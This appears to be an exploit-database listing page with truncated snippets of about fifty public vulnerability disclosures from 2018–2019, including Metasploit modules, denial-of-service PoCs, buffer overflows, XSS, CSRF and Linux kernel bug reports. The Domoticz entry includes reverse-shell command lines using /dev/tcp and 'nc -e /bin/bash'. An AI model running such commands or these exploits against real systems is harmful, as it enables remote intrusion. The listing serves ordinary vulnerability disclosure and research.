Agent Tesla Botnet - Information Disclosure

Exploit Title: Agent Tesla Botnet - Information Disclosure Disclosure Vulnerability Google Dork: n/a Date: 26/11/2018 Exploit Author: n4pst3r Vendor Homepage: unkn0wn Software Link: http://www.agenttesla.com/ ¡ Down ! Version: unkn0wn Tested on: Windows 10, debian 7 CVE : n/a Greetz: Shell.root,...

SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)

Exploit Title: SpotAuditor 5.2.6 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-27 Vendor Homepage: www.nsauditor.com Software Link: http://spotauditor.nsauditor.com/downloads/spotauditorsetup.exe Tested Version: 5.2.6 Tested on: Windows Windows 10 Single...

Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Moodle 3.6.3 - 'Install Plugin' Remote Command Execution", 'Description' = %q This module exploits a command execution vulnerability in Moodle...

Netgear DGN2200 / DGND3700 - Admin Password Disclosure

/bin/bash PoC based on CVE-2016-5649 created by Social Engineering Neo. Long Method: https://www.youtube.com/watch?v=f3awG0XPKAs https://www.shodan.io/search?query=DGN2200 = 2,325 possible vulnerable devices. https://www.shodan.io/search?query=DGND3700 = 555 possible vulnerable devices. A...

Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)

Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting Add/Edit Widget Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Date: 2019-04-27 Google Dork: N/A Vendor Homepage: https://www.veeam.com/ Software Link: https://www.veeam.com/virtual-server-management-one-free.html...

Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification

elfcoredump has a comment back from something like 2.5.43-C3 that says: / We no longer stop all VM operations. This is because those proceses that could possibly change mapcount or the mmap / vma pages are now blocked in doexit on current finishing this core dump. Only ptrace can touch these memo...

DeviceViewer 3.12.0.1 - 'user' SEH Overflow

Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow PoC Discovery Date: 25/04/2019 Exploit Author: Hayden Wright Vendor Homepage: www.sricam.com/ Software Link: http://download.sricam.com/Manual/DeviceViewer.exe Version: v3.12.0.1 Tested on: Windows XP Pro x64, Windows 7 32bit CVE :...

Domoticz 4.10577 - Unauthenticated Remote Command Execution

!/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse import requests import urllib import base64 import json impo...

Spring Cloud Config 2.1.x - Path Traversal (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Spring Cloud Config Server Directory Traversal', 'Description' = %q This module exploits an unauthenticated directory traversal vulnerability whi...

Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting

Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting Stored XSS Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Date: 2019-04-27 Google Dork: N/A Vendor Homepage: https://www.veeam.com/ Software Link: https://www.veeam.com/virtual-server-management-one-free.html...

Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow

Exploit Title: Free Float FTP 1.0 "STOR" Remote Buffer Overflow Google Dork: N/A Date: 4/26/2019 Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free Float FTP 1.0 Tested on: Windows XP Professional Service...

HumHub 1.3.12 - Cross-Site Scripting

Exploit Title: HumHub 1.3.12 - Cross-Site Scripting Exploit Author: Kağan EĞLENCE Vendor Homepage: https://humhub.org/ Version: 1.3.12 CVE : CVE-2019-11564 Url : http://localhost/humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php Vulnerable File :...

Pimcore < 5.71 - Unserialize Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Pimcore Unserialize RCE", 'Description' = %q This module exploits a PHP unserialize in Pimcore before 5.7.1 to execute arbitrary code. An...

AIS logistics ESEL-Server - Unauthenticated SQL Injection Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'AIS logistics ESEL-Server Unauth SQL Injection RCE', 'Description' = %q This module will execute an arbitrary payload on an "ESEL" server used by...

Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow

Exploit Title: Free Float FTP 1.0 "SIZE" Remote Buffer Overflow Google Dork: N/A Date: 4/26/2019 Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free Float FTP 1.0 Tested on: Windows XP Professional Service...

NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)

Exploit Title: NSauditor 3.1.2.0 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.2.0 Tested on: Windows 7 x64 Service Pack 1 Steps t...

NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)

Exploit Title: NSauditor 3.1.2.0 - 'Community' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.2.0 Tested on: Windows 7 x64 Service Pack 1...

Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting

Exploit Title: Stored XSS Date: 25-04-2019 Exploit Author: Dhiraj Mishra Vendor Homepage: https://portals.apache.org/pluto Software Link: https://portals.apache.org/pluto/download.html Version: 3.0.0, 3.0.1 Tested on: Ubuntu 16.04 LTS CVE: CVE-2019-0186 References:...

systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process

This bug report describes a bug in systemd that allows a service with DynamicUser in collaboration with another service or user to create a setuid binary that can be used to access its UID beyond the lifetime of the service. This bug probably has relatively low severity, given that there aren't...

Backup Key Recovery 2.2.4 - Denial of Service (PoC)

Exploit Title: Backup Key Recovery 2.2.4 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/backeyrecoverysetup.exe Tested Version: 2.2.4 Tested on: Windows 7 x64 Service Pac...

RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework TODO: add other non-payload files class MetasploitModule 'RARLAB WinRAR ACE Format Input Validation Remote Code Execution', 'Description' = %q In WinRAR versions prior t...

Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)

Exploit Title: Lavavo CD Ripper 4.20 Local Seh Exploit Date: 25.04.2019 Vendor Homepage:https://www.lavavosoftware.com Software Link: https://lavavo-cd-ripper.jaleco.com/download Exploit Author: Achilles Tested Version: 4.20 Tested on: Windows XP SP3 EN Windows 7 Sp1 x64 1.- Run python code :...

HeidiSQL 10.1.0.5464 - Denial of Service (PoC)

Exploit Title: HeidiSQL Portable 10.1.0.5464 - Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: https://www.heidisql.com/ Software Link: https://www.heidisql.com/downloads/releases/HeidiSQL10.164Portable.zip Tested Version: 10.1.0.5464 Tested on:...

JioFi 4G M2S 1.0.2 - 'mask' Cross-Site Scripting

Exploit Title: cgi-bin/qcmapwebcgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter. Exploit Author: Vikas Chaudhary Date: 21-01-2019 Vendor Homepage: https://www.jio.com/ Hardware Link:...

osTicket 1.11 - Cross-Site Scripting / Local File Inclusion

Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File Inclusion Date: 09.04.2019 Exploit Author: Özkan Mustafa Akkuş AkkuS @ehakkus Contact: https://pentest.com.tr Vendor Homepage: https://osticket.com Software Link: https://github.com/osTicket/osTicket References:...

JioFi 4G M2S 1.0.2 - Denial of Service

Exploit Title: cgi-bin/qcmapwebcgi on JioFi 4G M2S 1.0.2 devices allows a DoS Hang via the mask POST parameter Exploit Author: Vikas Chaudhary Date: 21-01-2019 Vendor Homepage: https://www.jio.com/ Hardware Link:...

AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)

Exploit Title: AnMing MP3 CD Burner 2.0 Local Dos Exploit Date: 25.04.2019 Vendor Homepage:http://www.ddz1977.com/ Software Link: https://files.downloadnow.com/s/software/10/56/16/74/anmingsetup.zip?token=1556228877063f2dc0aed064ee5d13374d8509661c&fileName=anmingsetup.zip Exploit Author: Achilles...

Google Chrome 72.0.3626.121 / 74.0.3725.0 - 'NewFixedDoubleArray' Integer Overflow

VULNERABILITY DETAILS https://cs.chromium.org/chromium/src/v8/src/heap/factory.cc?rcl=dd689541d3815d64b4b39f6a41603248c71aa00e&l=496 Handle Factory::NewFixedDoubleArrayint length, PretenureFlag pretenure DCHECKLE0, length; if length == 0 return emptyfixedarray; if length...

VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation

VirtualBox: COM RPC Interface Code Injection Host EoP Platform: VirtualBox 6.0.4 r128413 x64 on Windows 10 1809 Class: Elevation of Privilege Summary: The hardened VirtualBox process on a Windows host doesn’t secure its COM interface leading to arbitrary code injection and EoP. Description: This...

Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition

/ The Siemens R3964 line discipline code in drivers/tty/nr3964.c has a few races around its ioctl handler; for example, the handler for R3964ENABLESIGNALS just allocates and deletes elements in a linked list with zero locking. This code is reachable by an unprivileged user if the line discipline ...

systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit

As documented at , for any action, a polkit policy can specify separate levels of required authentication based on whether a client is: - in an active session on a local console - in an inactive session on a local console - or neither This is expressed in the policy using the elements "allowany",...

Linux - 'page->_refcount' Overflow via FUSE

Linux: page-refcount overflow via FUSE with 140GiB RAM usage Tested on: Debian Buster distro kernel "4.19.0-1-amd64 1 SMP Debian 4.19.12-1 2018-12-22" KVM guest with 160000MiB RAM A while back, there was some discussion about possible overflows of the mapcount in struct page, started by Daniel...

Ross Video DashBoard 8.5.1 - Insecure Permissions

Ross Video DashBoard 8.5.1 Insecure Permissions Vendor: Ross Video Ltd. Product web page: https://www.rossvideo.com Affected version: 8.5.1 Summary: DashBoard is a free and open platform from Ross Video for facility control and monitoring that enables users to quickly build unique, tailored Custo...

Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)

var arr1 = 0,1; function ObjCreatemake this.make = make; var obj1 = new ObjCreate; function main arr1.reducef3; Object.getOwnPropertyDescriptorsArray99.joinobj1.make; function f3 obj1"make" = RegExpArray60000.join"CCC";...

74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)

Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user Date: 2019-04-14 Exploit Author: ax8 Vendor Homepage: https://github.com/Li-Siyuan Software Link: http://www.74cms.com/download/index.html Version: v5.0.1 CVE : CVE-2019-11374 74CMS v5.0.1 has a CSRF vulnerability to add...

Ease Audio Converter 5.30 - '.mp4' Denial of Service (PoC)

Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit Date: 19.04.19 Vendor Homepage:http://www.audiotool.net/download.htm Software Link: http://www.audiotool.net/download/audioconverter.exe Exploit Author: Achilles Tested Version: 5.30 Tested on: Windows 7 x64 Sp1 1.- Run the python...

WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion

Exploit Title: Contact Form Builder CSRF → LFI Date: 2019-03-17 Exploit Author: Panagiotis Vagenas Vendor Homepage: http://web-dorado.com/ Software Link: https://wordpress.org/plugins/contact-form-builder Version: 1.0.67 Tested on: WordPress 5.1.1 Description ----------- Plugin implements the...

Msvod 10 - Cross-Site Request Forgery (Change User Information)

Exploit Title: Msvod v10 has a CSRF vulnerability to change user information Date: 2019-04-14 Exploit Author: ax8 Vendor Homepage: https://github.com/Li-Siyuan Software Link: https://www.msvodx.com/ Version: v10 CVE : CVE-2019-11375 Msvod v10 has a CSRF vulnerability to change user information vi...

ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine Applications Manager %q This module exploits sqli and command injection vulnerability in the ManageEngine AM 14 and prior versions. I...

LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)

!/usr/bin/python Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow Vanilla Date: 20-04-2019 Exploit Author: Dino Covotsos - Telspace Systems Vendor Homepage: http://www.labf.com/nfsaxe Version: 3.7 Software Link : http://www.labf.com/download/nfsaxe.exe Contact: [email protected]...

QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service

!/usr/bin/python Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS Date: 19/04/2019 Exploit Author: Dino Covotsos - Telspace Systems Vendor Homepage: https://www.qnap.com Version: 1.3.4.0317 and below are vulnerable Software Link: https://www.qnap.com/en/utilities/essentials Contact...

UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting

Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting Google Dork: intext:"by UliCMS" Exploit Author: Kağan EĞLENCE Vendor Homepage: https://en.ulicms.de/ Version: 2019.2 , 2019.1 CVE : CVE-2019-11398 Vulnerability 1 Url :...

Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal

Exploit Title: Directory traversal in Oracle Business Intelligence Date: 16.04.19 Exploit Author: @vah13 Vendor Homepage: http://oracle.com Software Link: https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0 Tested on...

SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'SystemTap MODPROBEOPTIONS Privilege Escalation', 'Description' = %q This module attempts to gain root privileges by exploiting a vulnerability in...

Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection

Exploit Title: XXE in Oracle Business Intelligence and XML Publisher Date: 16.04.19 Exploit Author: @vah13 Vendor Homepage: http://oracle.com Software Link: https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0 Tested...

Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Atlassian Confluence Widget Connector Macro Velocity Template Injection", 'Description' = %q Widget Connector Macro is part of Atlassian Confluen...

Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)

Exploit Title: Netwide Assembler NASM 2.14rc15 NULL Pointer Dereference PoC Date: 2018-09-05 Exploit Author: Fakhri Zulkifli Vendor Homepage: https://www.nasm.us/ Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D Version: 2.14rc15 and earlier Tested on: 2.14rc15 CVE :...

Evernote 7.9 - Code Execution via Path Traversal

Exploit Title: Code execution via path traversal Date: 17-04-2019 Exploit Author: Dhiraj Mishra Vendor Homepage: http://evernote.com/ Software Link: https://evernote.com/download Version: 7.9 Tested on: macOS Mojave v10.14.4 CVE: CVE-2019-10038 References:...

ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine Applications Manager 11.0 %q This module exploits sql and command injection vulnerability in the ManageEngine AM 14 and prior version...

LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LibreOffice Macro Code Execution', 'Description' = %q LibreOffice comes bundled with sample macros written in Python and allows the ability to bi...